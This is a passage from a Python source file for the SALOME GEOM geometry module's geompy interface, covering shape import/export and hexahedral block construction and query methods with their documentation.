objects. The first one is the imported object followed by
material groups.
Note:
Auto publishing is allowed for the shape itself. Imported
material groups are not automatically published.
"""
# Example: see GEOM_TestOthers.py
print """
WARNING: Function ImportFile is deprecated, use Import<FormatName> instead,
where <FormatName> is a name of desirable format for importing.
"""
aListObj = self.InsertOp.ImportFile(theFileName, theFormatName)
RaiseIfFailed("ImportFile", self.InsertOp)
aNbObj = len(aListObj)
if aNbObj > 0:
self._autoPublish(aListObj[0], theName, "imported")
if aNbObj == 1:
return aListObj[0]
return aListObj
## Deprecated analog of ImportFile()
def Import(self, theFileName, theFormatName, theName=None):
"""
Deprecated analog of geompy.ImportFile, kept for backward compatibility only.
"""
# note: auto-publishing is done in self.ImportFile()
return self.ImportFile(theFileName, theFormatName, theName)
## Read a shape from the binary stream, containing its bounding representation (BRep).
# @note This method will not be dumped to the python script by DumpStudy functionality.
# @note GEOM.GEOM_Object.GetShapeStream() method can be used to obtain the shape's BRep stream.
# @param theStream The BRep binary stream.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM_Object, containing the shape, read from theStream.
#
# @ref swig_Import_Export "Example"
@ManageTransactions("InsertOp")
def RestoreShape (self, theStream, theName=None):
"""
Read a shape from the binary stream, containing its bounding representation (BRep).
Note:
shape.GetShapeStream() method can be used to obtain the shape's BRep stream.
Parameters:
theStream The BRep binary stream.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM_Object, containing the shape, read from theStream.
"""
# Example: see GEOM_TestOthers.py
anObj = self.InsertOp.RestoreShape(theStream)
RaiseIfFailed("RestoreShape", self.InsertOp)
self._autoPublish(anObj, theName, "restored")
return anObj
## Export the given shape into a file with given name.
#
# Note: this function is deprecated, it is kept for backward compatibility only
# Use Export<FormatName> instead, where <FormatName> is a name of desirable format to export.
#
# @param theObject Shape to be stored in the file.
# @param theFileName Name of the file to store the given shape in.
# @param theFormatName Specify format for the shape storage.
# Available formats can be obtained with
# geompy.InsertOp.ExportTranslators()[0] method.
#
# @ref swig_Import_Export "Example"
@ManageTransactions("InsertOp")
def Export(self, theObject, theFileName, theFormatName):
"""
Export the given shape into a file with given name.
Note: this function is deprecated, it is kept for backward compatibility only
Use Export<FormatName> instead, where <FormatName> is a name of desirable format to export.
Parameters:
theObject Shape to be stored in the file.
theFileName Name of the file to store the given shape in.
theFormatName Specify format for the shape storage.
Available formats can be obtained with
geompy.InsertOp.ExportTranslators()[0] method.
"""
# Example: see GEOM_TestOthers.py
print """
WARNING: Function Export is deprecated, use Export<FormatName> instead,
where <FormatName> is a name of desirable format for exporting.
"""
self.InsertOp.Export(theObject, theFileName, theFormatName)
if self.InsertOp.IsDone() == 0:
raise RuntimeError, "Export : " + self.InsertOp.GetErrorCode()
pass
pass
# end of l2_import_export
## @}
## @addtogroup l3_blocks
## @{
## Create a quadrangle face from four edges. Order of Edges is not
# important. It is not necessary that edges share the same vertex.
# @param E1,E2,E3,E4 Edges for the face bound.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created face.
#
# @ref tui_building_by_blocks_page "Example"
@ManageTransactions("BlocksOp")
def MakeQuad(self, E1, E2, E3, E4, theName=None):
"""
Create a quadrangle face from four edges. Order of Edges is not
important. It is not necessary that edges share the same vertex.
Parameters:
E1,E2,E3,E4 Edges for the face bound.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created face.
Example of usage:
qface1 = geompy.MakeQuad(edge1, edge2, edge3, edge4)
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.MakeQuad(E1, E2, E3, E4)
RaiseIfFailed("MakeQuad", self.BlocksOp)
self._autoPublish(anObj, theName, "quad")
return anObj
## Create a quadrangle face on two edges.
# The missing edges will be built by creating the shortest ones.
# @param E1,E2 Two opposite edges for the face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created face.
#
# @ref tui_building_by_blocks_page "Example"
@ManageTransactions("BlocksOp")
def MakeQuad2Edges(self, E1, E2, theName=None):
"""
Create a quadrangle face on two edges.
The missing edges will be built by creating the shortest ones.
Parameters:
E1,E2 Two opposite edges for the face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created face.
Example of usage:
# create vertices
p1 = geompy.MakeVertex( 0., 0., 0.)
p2 = geompy.MakeVertex(150., 30., 0.)
p3 = geompy.MakeVertex( 0., 120., 50.)
p4 = geompy.MakeVertex( 0., 40., 70.)
# create edges
edge1 = geompy.MakeEdge(p1, p2)
edge2 = geompy.MakeEdge(p3, p4)
# create a quadrangle face from two edges
qface2 = geompy.MakeQuad2Edges(edge1, edge2)
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.MakeQuad2Edges(E1, E2)
RaiseIfFailed("MakeQuad2Edges", self.BlocksOp)
self._autoPublish(anObj, theName, "quad")
return anObj
## Create a quadrangle face with specified corners.
# The missing edges will be built by creating the shortest ones.
# @param V1,V2,V3,V4 Corner vertices for the face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created face.
#
# @ref tui_building_by_blocks_page "Example 1"
# \n @ref swig_MakeQuad4Vertices "Example 2"
@ManageTransactions("BlocksOp")
def MakeQuad4Vertices(self, V1, V2, V3, V4, theName=None):
"""
Create a quadrangle face with specified corners.
The missing edges will be built by creating the shortest ones.
Parameters:
V1,V2,V3,V4 Corner vertices for the face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created face.
Example of usage:
# create vertices
p1 = geompy.MakeVertex( 0., 0., 0.)
p2 = geompy.MakeVertex(150., 30., 0.)
p3 = geompy.MakeVertex( 0., 120., 50.)
p4 = geompy.MakeVertex( 0., 40., 70.)
# create a quadrangle from four points in its corners
qface3 = geompy.MakeQuad4Vertices(p1, p2, p3, p4)
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.MakeQuad4Vertices(V1, V2, V3, V4)
RaiseIfFailed("MakeQuad4Vertices", self.BlocksOp)
self._autoPublish(anObj, theName, "quad")
return anObj
## Create a hexahedral solid, bounded by the six given faces. Order of
# faces is not important. It is not necessary that Faces share the same edge.
# @param F1,F2,F3,F4,F5,F6 Faces for the hexahedral solid.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created solid.
#
# @ref tui_building_by_blocks_page "Example 1"
# \n @ref swig_MakeHexa "Example 2"
@ManageTransactions("BlocksOp")
def MakeHexa(self, F1, F2, F3, F4, F5, F6, theName=None):
"""
Create a hexahedral solid, bounded by the six given faces. Order of
faces is not important. It is not necessary that Faces share the same edge.
Parameters:
F1,F2,F3,F4,F5,F6 Faces for the hexahedral solid.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created solid.
Example of usage:
solid = geompy.MakeHexa(qface1, qface2, qface3, qface4, qface5, qface6)
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.MakeHexa(F1, F2, F3, F4, F5, F6)
RaiseIfFailed("MakeHexa", self.BlocksOp)
self._autoPublish(anObj, theName, "hexa")
return anObj
## Create a hexahedral solid between two given faces.
# The missing faces will be built by creating the smallest ones.
# @param F1,F2 Two opposite faces for the hexahedral solid.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created solid.
#
# @ref tui_building_by_blocks_page "Example 1"
# \n @ref swig_MakeHexa2Faces "Example 2"
@ManageTransactions("BlocksOp")
def MakeHexa2Faces(self, F1, F2, theName=None):
"""
Create a hexahedral solid between two given faces.
The missing faces will be built by creating the smallest ones.
Parameters:
F1,F2 Two opposite faces for the hexahedral solid.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created solid.
Example of usage:
solid1 = geompy.MakeHexa2Faces(qface1, qface2)
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.MakeHexa2Faces(F1, F2)
RaiseIfFailed("MakeHexa2Faces", self.BlocksOp)
self._autoPublish(anObj, theName, "hexa")
return anObj
# end of l3_blocks
## @}
## @addtogroup l3_blocks_op
## @{
## Get a vertex, found in the given shape by its coordinates.
# @param theShape Block or a compound of blocks.
# @param theX,theY,theZ Coordinates of the sought vertex.
# @param theEpsilon Maximum allowed distance between the resulting
# vertex and point with the given coordinates.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found vertex.
#
# @ref swig_GetPoint "Example"
@ManageTransactions("BlocksOp")
def GetPoint(self, theShape, theX, theY, theZ, theEpsilon, theName=None):
"""
Get a vertex, found in the given shape by its coordinates.
Parameters:
theShape Block or a compound of blocks.
theX,theY,theZ Coordinates of the sought vertex.
theEpsilon Maximum allowed distance between the resulting
vertex and point with the given coordinates.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found vertex.
Example of usage:
pnt = geompy.GetPoint(shape, -50, 50, 50, 0.01)
"""
# Example: see GEOM_TestOthers.py
anObj = self.BlocksOp.GetPoint(theShape, theX, theY, theZ, theEpsilon)
RaiseIfFailed("GetPoint", self.BlocksOp)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Find a vertex of the given shape, which has minimal distance to the given point.
# @param theShape Any shape.
# @param thePoint Point, close to the desired vertex.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found vertex.
#
# @ref swig_GetVertexNearPoint "Example"
@ManageTransactions("BlocksOp")
def GetVertexNearPoint(self, theShape, thePoint, theName=None):
"""
Find a vertex of the given shape, which has minimal distance to the given point.
Parameters:
theShape Any shape.
thePoint Point, close to the desired vertex.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found vertex.
Example of usage:
pmidle = geompy.MakeVertex(50, 0, 50)
edge1 = geompy.GetEdgeNearPoint(blocksComp, pmidle)
"""
# Example: see GEOM_TestOthers.py
anObj = self.BlocksOp.GetVertexNearPoint(theShape, thePoint)
RaiseIfFailed("GetVertexNearPoint", self.BlocksOp)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Get an edge, found in the given shape by two given vertices.
# @param theShape Block or a compound of blocks.
# @param thePoint1,thePoint2 Points, close to the ends of the desired edge.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found edge.
#
# @ref swig_GetEdge "Example"
@ManageTransactions("BlocksOp")
def GetEdge(self, theShape, thePoint1, thePoint2, theName=None):
"""
Get an edge, found in the given shape by two given vertices.
Parameters:
theShape Block or a compound of blocks.
thePoint1,thePoint2 Points, close to the ends of the desired edge.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found edge.
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.GetEdge(theShape, thePoint1, thePoint2)
RaiseIfFailed("GetEdge", self.BlocksOp)
self._autoPublish(anObj, theName, "edge")
return anObj
## Find an edge of the given shape, which has minimal distance to the given point.
# @param theShape Block or a compound of blocks.
# @param thePoint Point, close to the desired edge.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found edge.
#
# @ref swig_GetEdgeNearPoint "Example"
@ManageTransactions("BlocksOp")
def GetEdgeNearPoint(self, theShape, thePoint, theName=None):
"""
Find an edge of the given shape, which has minimal distance to the given point.
Parameters:
theShape Block or a compound of blocks.
thePoint Point, close to the desired edge.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found edge.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BlocksOp.GetEdgeNearPoint(theShape, thePoint)
RaiseIfFailed("GetEdgeNearPoint", self.BlocksOp)
self._autoPublish(anObj, theName, "edge")
return anObj
## Returns a face, found in the given shape by four given corner vertices.
# @param theShape Block or a compound of blocks.
# @param thePoint1,thePoint2,thePoint3,thePoint4 Points, close to the corners of the desired face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found face.
#
# @ref swig_todo "Example"
@ManageTransactions("BlocksOp")
def GetFaceByPoints(self, theShape, thePoint1, thePoint2, thePoint3, thePoint4, theName=None):
"""
Returns a face, found in the given shape by four given corner vertices.
Parameters:
theShape Block or a compound of blocks.
thePoint1,thePoint2,thePoint3,thePoint4 Points, close to the corners of the desired face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found face.
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.GetFaceByPoints(theShape, thePoint1, thePoint2, thePoint3, thePoint4)
RaiseIfFailed("GetFaceByPoints", self.BlocksOp)
self._autoPublish(anObj, theName, "face")
return anObj
## Get a face of block, found in the given shape by two given edges.
# @param theShape Block or a compound of blocks.
# @param theEdge1,theEdge2 Edges, close to the edges of the desired face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found face.
#
# @ref swig_todo "Example"
@ManageTransactions("BlocksOp")
def GetFaceByEdges(self, theShape, theEdge1, theEdge2, theName=None):
"""
Get a face of block, found in the given shape by two given edges.
Parameters:
theShape Block or a compound of blocks.
theEdge1,theEdge2 Edges, close to the edges of the desired face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found face.
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.GetFaceByEdges(theShape, theEdge1, theEdge2)
RaiseIfFailed("GetFaceByEdges", self.BlocksOp)
self._autoPublish(anObj, theName, "face")
return anObj
## Find a face, opposite to the given one in the given block.
# @param theBlock Must be a hexahedral solid.
# @param theFace Face of \a theBlock, opposite to the desired face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found face.
#
# @ref swig_GetOppositeFace "Example"
@ManageTransactions("BlocksOp")
def GetOppositeFace(self, theBlock, theFace, theName=None):
"""
Find a face, opposite to the given one in the given block.
Parameters:
theBlock Must be a hexahedral solid.
theFace Face of theBlock, opposite to the desired face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found face.
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.GetOppositeFace(theBlock, theFace)
RaiseIfFailed("GetOppositeFace", self.BlocksOp)
self._autoPublish(anObj, theName, "face")
return anObj
## Find a face of the given shape, which has minimal distance to the given point.
# @param theShape Block or a compound of blocks.
# @param thePoint Point, close to the desired face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found face.
#
# @ref swig_GetFaceNearPoint "Example"
@ManageTransactions("BlocksOp")
def GetFaceNearPoint(self, theShape, thePoint, theName=None):
"""
Find a face of the given shape, which has minimal distance to the given point.
Parameters:
theShape Block or a compound of blocks.
thePoint Point, close to the desired face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found face.
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.GetFaceNearPoint(theShape, thePoint)
RaiseIfFailed("GetFaceNearPoint", self.BlocksOp)
self._autoPublish(anObj, theName, "face")
return anObj
## Find a face of block, whose outside normale has minimal angle with the given vector.
# @param theBlock Block or a compound of blocks.
# @param theVector Vector, close to the normale of the desired face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found face.
#
# @ref swig_todo "Example"
@ManageTransactions("BlocksOp")
def GetFaceByNormale(self, theBlock, theVector, theName=None):
"""
Find a face of block, whose outside normale has minimal angle with the given vector.
Parameters:
theBlock Block or a compound of blocks.
theVector Vector, close to the normale of the desired face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found face.
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.GetFaceByNormale(theBlock, theVector)
RaiseIfFailed("GetFaceByNormale", self.BlocksOp)
self._autoPublish(anObj, theName, "face")
return anObj
## Find all sub-shapes of type \a theShapeType of the given shape,
# which have minimal distance to the given point.
# @param theShape Any shape.
# @param thePoint Point, close to the desired shape.
# @param theShapeType Defines what kind of sub-shapes is searched GEOM::shape_type
# @param theTolerance The tolerance for distances comparison. All shapes
# with distances to the given point in interval
# [minimal_distance, minimal_distance + theTolerance] will be gathered.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM_Object, containing a group of all found shapes.
#
# @ref swig_GetShapesNearPoint "Example"
@ManageTransactions("BlocksOp")
def GetShapesNearPoint(self, theShape, thePoint, theShapeType, theTolerance = 1e-07, theName=None):
"""
Find all sub-shapes of type theShapeType of the given shape,
which have minimal distance to the given point.
Parameters:
theShape Any shape.
thePoint Point, close to the desired shape.
theShapeType Defines what kind of sub-shapes is searched (see GEOM::shape_type)
theTolerance The tolerance for distances comparison. All shapes
with distances to the given point in interval
[minimal_distance, minimal_distance + theTolerance] will be gathered.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM_Object, containing a group of all found shapes.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BlocksOp.GetShapesNearPoint(theShape, thePoint, theShapeType, theTolerance)
RaiseIfFailed("GetShapesNearPoint", self.BlocksOp)
self._autoPublish(anObj, theName, "group")
return anObj
# end of l3_blocks_op
## @}
## @addtogroup l4_blocks_measure
## @{
## Check, if the compound of blocks is given.
# To be considered as a compound of blocks, the
# given shape must satisfy the following conditions:
# - Each element of the compound should be a Block (6 faces and 12 edges).
# - A connection between two Blocks should be an entire quadrangle face or an entire edge.
# - The compound should be connexe.
# - The glue between two quadrangle faces should be applied.
# @param theCompound The compound to check.
# @return TRUE, if the given shape is a compound of blocks.
# If theCompound is not valid, prints all discovered errors.
#
# @ref tui_measurement_tools_page "Example 1"
# \n @ref swig_CheckCompoundOfBlocks "Example 2"
@ManageTransactions("BlocksOp")
def CheckCompoundOfBlocks(self,theCompound):
"""
Check, if the compound of blocks is given.
To be considered as a compound of blocks, the
given shape must satisfy the following conditions:
- Each element of the compound should be a Block (6 faces and 12 edges).
- A connection between two Blocks should be an entire quadrangle face or an entire edge.
- The compound should be connexe.
- The glue between two quadrangle faces should be applied.
Parameters:
theCompound The compound to check.
Returns:
TRUE, if the given shape is a compound of blocks.
If theCompound is not valid, prints all discovered errors.
"""
# Example: see GEOM_Spanner.py
(IsValid, BCErrors) = self.BlocksOp.CheckCompoundOfBlocks(theCompound)
RaiseIfFailed("CheckCompoundOfBlocks", self.BlocksOp)
if IsValid == 0:
Descr = self.BlocksOp.PrintBCErrors(theCompound, BCErrors)
print Descr
return IsValid
## Retrieve all non blocks solids and faces from \a theShape.
# @param theShape The shape to explore.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return A tuple of two GEOM_Objects. The first object is a group of all
# non block solids (= not 6 faces, or with 6 faces, but with the
# presence of non-quadrangular faces). The second object is a
# group of all non quadrangular faces.
#
# @ref tui_measurement_tools_page "Example 1"
# \n @ref swig_GetNonBlocks "Example 2"
@ManageTransactions("BlocksOp")
def GetNonBlocks (self, theShape, theName=None):
"""
Retrieve all non blocks solids and faces from theShape.
Parameters:
theShape The shape to explore.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
A tuple of two GEOM_Objects. The first object is a group of all
non block solids (= not 6 faces, or with 6 faces, but with the
presence of non-quadrangular faces). The second object is a
group of all non quadrangular faces.
Usage:
(res_sols, res_faces) = geompy.GetNonBlocks(myShape1)
"""
# Example: see GEOM_Spanner.py
aTuple = self.BlocksOp.GetNonBlocks(theShape)
RaiseIfFailed("GetNonBlocks", self.BlocksOp)
self._autoPublish(aTuple, theName, ("groupNonHexas", "groupNonQuads"))
return aTuple
## Remove all seam and degenerated edges from \a theShape.
# Unite faces and edges, sharing one surface. It means that
# this faces must have references to one C++ surface object (handle).
# @param theShape The compound or single solid to remove irregular edges from.
# @param doUnionFaces If True, then unite faces. If False (the default value),
# do not unite faces.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return Improved shape.
#
# @ref swig_RemoveExtraEdges "Example"
@ManageTransactions("BlocksOp")
def RemoveExtraEdges(self, theShape, doUnionFaces=False, theName=None):
"""
Remove all seam and degenerated edges from theShape.
Unite faces and edges, sharing one surface. It means that
this faces must have references to one C++ surface object (handle).
Parameters:
theShape The compound or single solid to remove irregular edges from.
doUnionFaces If True, then unite faces. If False (the default value),
do not unite faces.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
Improved shape.
"""
# Example: see GEOM_TestOthers.py
nbFacesOptimum = -1 # -1 means do not unite faces
if doUnionFaces is True: nbFacesOptimum = 0 # 0 means unite faces
anObj = self.BlocksOp.RemoveExtraEdges(theShape, nbFacesOptimum)
RaiseIfFailed("RemoveExtraEdges", self.BlocksOp)
self._autoPublish(anObj, theName, "removeExtraEdges")
return anObj
## Performs union faces of \a theShape
# Unite faces sharing one surface. It means that
# these faces must have references to one C++ surface object (handle).
# @param theShape The compound or single solid that contains faces
# to perform union.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return Improved shape.
#
# @ref swig_UnionFaces "Example"
@ManageTransactions("BlocksOp")
def UnionFaces(self, theShape, theName=None):
"""
Performs union faces of theShape.
Unite faces sharing one surface. It means that
these faces must have references to one C++ surface object (handle).
Parameters:
theShape The compound or single solid that contains faces
to perform union.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
Improved shape.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BlocksOp.UnionFaces(theShape)
RaiseIfFailed("UnionFaces", self.BlocksOp)
self._autoPublish(anObj, theName, "unionFaces")
return anObj
## Check, if the given shape is a blocks compound.
# Fix all detected errors.
# \note Single block can be also fixed by this method.
# @param theShape The compound to check and improve.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return Improved compound.
#
# @ref swig_CheckAndImprove "Example"
@ManageTransactions("BlocksOp")
def CheckAndImprove(self, theShape, theName=None):
"""
Check, if the given shape is a blocks compound.
Fix all detected errors.
Note:
Single block can be also fixed by this method.
Parameters:
theShape The compound to check and improve.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
Improved compound.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BlocksOp.CheckAndImprove(theShape)
RaiseIfFailed("CheckAndImprove", self.BlocksOp)
self._autoPublish(anObj, theName, "improved")
return anObj
# end of l4_blocks_measure
## @}
## @addtogroup l3_blocks_op
## @{
## Get all the blocks, contained in the given compound.
# @param theCompound The compound to explode.
# @param theMinNbFaces If solid has lower number of faces, it is not a block.
# @param theMaxNbFaces If solid has higher number of faces, it is not a block.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note If theMaxNbFaces = 0, the maximum number of faces is not restricted.
#
# @return List of GEOM.GEOM_Object, containing the retrieved blocks.
#
# @ref tui_explode_on_blocks "Example 1"
# \n @ref swig_MakeBlockExplode "Example 2"
@ManageTransactions("BlocksOp")
def MakeBlockExplode(self, theCompound, theMinNbFaces, theMaxNbFaces, theName=None):
"""
Get all the blocks, contained in the given compound.
Parameters:
theCompound The compound to explode.
theMinNbFaces If solid has lower number of faces, it is not a block.
theMaxNbFaces If solid has higher number of faces, it is not a block.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Note:
If theMaxNbFaces = 0, the maximum number of faces is not restricted.
Returns:
List of GEOM.GEOM_Object, containing the retrieved blocks.
"""
# Example: see GEOM_TestOthers.py
theMinNbFaces,theMaxNbFaces,Parameters = ParseParameters(theMinNbFaces,theMaxNbFaces)
aList = self.BlocksOp.ExplodeCompoundOfBlocks(theCompound, theMinNbFaces, theMaxNbFaces)
RaiseIfFailed("ExplodeCompoundOfBlocks", self.BlocksOp)
for anObj in aList:
anObj.SetParameters(Parameters)
pass
self._autoPublish(aList, theName, "block")
return aList
## Find block, containing the given point inside its volume or on boundary.
# @param theCompound Compound, to find block in.
# @param thePoint Point, close to the desired block. If the point lays on
# boundary between some blocks, we return block with nearest center.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found block.
#
# @ref swig_todo "Example"
@ManageTransactions("BlocksOp")
def GetBlockNearPoint(self, theCompound, thePoint, theName=None):
"""
Find block, containing the given point inside its volume or on boundary.
Parameters:
theCompound Compound, to find block in.
thePoint Point, close to the desired block. If the point lays on
boundary between some blocks, we return block with nearest center.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found block.
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.GetBlockNearPoint(theCompound, thePoint)
RaiseIfFailed("GetBlockNearPoint", self.BlocksOp)
self._autoPublish(anObj, theName, "block")
return anObj
## Find block, containing all the elements, passed as the parts, or maximum quantity of them.
# @param theCompound Compound, to find block in.
# @param theParts List of faces and/or edges and/or vertices to be parts of the found block.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found block.
#
# @ref swig_GetBlockByParts "Example"
@ManageTransactions("BlocksOp")
def GetBlockByParts(self, theCompound, theParts, theName=None):
"""
Find block, containing all the elements, passed as the parts, or maximum quantity of them.
Parameters:
theCompound Compound, to find block in.
theParts List of faces and/or edges and/or vertices to be parts of the found block.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM_Object, containing the found block.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BlocksOp.GetBlockByParts(theCompound, theParts)
RaiseIfFailed("GetBlockByParts", self.BlocksOp)
self._autoPublish(anObj, theName, "block")
return anObj
## Return all blocks, containing all the elements, passed as the parts.
# @param theCompound Compound, to find blocks in.
# @param theParts List of faces and/or edges and/or vertices to be parts of the found blocks.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of GEOM.GEOM_Object, containing the found blocks.
#
# @ref swig_todo "Example"
@ManageTransactions("BlocksOp")
def GetBlocksByParts(self, theCompound, theParts, theName=None):
"""
Return all blocks, containing all the elements, passed as the parts.
Parameters:
theCompound Compound, to find blocks in.
theParts List of faces and/or edges and/or vertices to be parts of the found blocks.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of GEOM.GEOM_Object, containing the found blocks.
"""
# Example: see GEOM_Spanner.py
aList = self.BlocksOp.GetBlocksByParts(theCompound, theParts)
RaiseIfFailed("GetBlocksByParts", self.BlocksOp)
self._autoPublish(aList, theName, "block")
return aList
## Multi-transformate block and glue the result.
# Transformation is defined so, as to superpose direction faces.
# @param Block Hexahedral solid to be multi-transformed.
# @param DirFace1 ID of First direction face.
# @param DirFace2 ID of Second direction face.
# @param NbTimes Quantity of transformations to be done.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note Unique ID of sub-shape can be obtained, using method GetSubShapeID().
#
# @return New GEOM.GEOM_Object, containing the result shape.
#
# @ref tui_multi_transformation "Example"
@ManageTransactions("BlocksOp")
